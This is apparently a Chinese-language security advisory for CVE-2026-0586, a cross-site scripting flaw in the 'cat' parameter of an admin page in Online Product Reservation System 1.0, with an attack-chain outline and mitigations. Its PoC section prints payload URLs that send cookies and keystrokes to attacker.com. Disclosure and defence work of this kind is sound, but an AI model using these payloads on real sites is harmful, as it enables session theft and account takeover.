CVE-2026-0586 | Online Product Reservation System 1.0 跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2026-0586

漏洞类型

XSS（跨站脚本攻击）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

code-projects Online Product Reservation System 1.0

漏洞概述

CVE-2026-0586是code-projects在线产品预订系统1.0版本中的一个存储型跨站脚本（XSS）漏洞。该漏洞存在于管理后台的prod.php文件中，由于对用户输入的cat参数未进行充分的输入验证和输出编码，攻击者可以通过构造恶意的JavaScript脚本并将其注入到应用程序中。当其他用户访问包含恶意脚本的页面时，脚本将在其浏览器上下文中执行，从而窃取会话Cookie、劫持用户账户、修改页面内容或进行钓鱼攻击。由于该漏洞需要用户交互才能触发，攻击者通常会诱导管理员或普通用户访问恶意构造的链接或页面。此漏洞的CVSS评分为4.3，属于中危级别，攻击复杂度低，但需要用户交互才能成功利用。

技术细节

该漏洞属于反射型或存储型跨站脚本漏洞，攻击向量为网络路径。漏洞存在于handgunner-administrator/prod.php文件中的未知函数，该函数直接使用用户提交的cat参数而未进行任何过滤或转义处理。攻击者可以通过在cat参数中注入HTML或JavaScript代码，如<script>alert(document.cookie)</script>，当系统将该参数值回显到页面时，恶意脚本将在受害者的浏览器中执行。由于CVSS向量显示需要用户交互（UI:R），攻击者通常会通过社会工程学手段诱导目标用户点击恶意链接。漏洞的完整性影响为低（I:L），意味着攻击者可能修改部分页面内容或执行有限的恶意操作，但不涉及机密数据访问。该漏洞影响产品的核心预订功能模块，攻击成功可能导致用户会话被劫持、管理员账户被盗用等严重后果。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标系统为code-projects Online Product Reservation System 1.0，并定位到漏洞文件handgunner-administrator/prod.php

STEP 2

步骤2: 构造恶意载荷

攻击者针对cat参数构造XSS恶意载荷，如<script>alert(document.cookie)</script>或用于窃取Cookie的脚本

STEP 3

步骤3: 诱骗用户访问

攻击者通过钓鱼邮件、社交工程或其他渠道诱导目标用户（管理员或普通用户）访问包含恶意载荷的URL

STEP 4

步骤4: 执行恶意脚本

当用户访问恶意URL时，服务器将未过滤的cat参数值返回给用户浏览器，浏览器将其作为HTML/JS执行

STEP 5

步骤5: 窃取敏感信息

恶意脚本在用户浏览器中执行，可窃取会话Cookie、劫持用户会话、获取用户输入的敏感信息或修改页面内容

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2026-0586 PoC - Online Product Reservation System 1.0 XSS -->
<!-- Target: handgunner-administrator/prod.php -->
<!-- Attack Vector: cat parameter -->

<!-- Basic XSS PoC -->
http://target.com/handgunner-administrator/prod.php?cat=<script>alert('XSS')</script>

<!-- Cookie Stealing PoC -->
http://target.com/handgunner-administrator/prod.php?cat=<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script>

<!-- Keylogger PoC -->
http://target.com/handgunner-administrator/prod.php?cat=<script>document.onkeypress=function(e){new Image().src='http://attacker.com/log.php?key='+e.key}</script>

<!-- HTML Injection with Script -->
http://target.com/handgunner-administrator/prod.php?cat=<img src=x onerror="this.src='http://attacker.com/img.gif?c='+document.cookie">

影响范围

Online Product Reservation System 1.0

防御指南

临时缓解措施

在厂商发布正式修复补丁之前，可采取以下临时缓解措施：1) 在Web应用层部署XSS过滤器，对cat参数进行强制过滤；2) 启用HttpOnly和Secure标志保护Cookie；3) 限制管理后台的访问来源，添加IP白名单限制；4) 增强用户安全意识培训，提醒不要点击可疑链接；5) 启用Web应用防火墙规则拦截XSS攻击特征；6) 定期审查应用日志，检测潜在的恶意访问行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-0586
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-0586
3 Details https://www.cvedetails.com/cve/CVE-2026-0586/
4 VulDB https://vuldb.com/cve/CVE-2026-0586
5 Link https://code-projects.org/
6 Link https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/xss_prod.php.md
7 Link https://github.com/foeCat/CVE/blob/main/OnlineProductReservation_PHP/xss_prod.php.md#poc
8 Link https://vuldb.com/?ctiid.339478
9 Link https://vuldb.com/?id.339478
10 Link https://vuldb.com/?submit.731098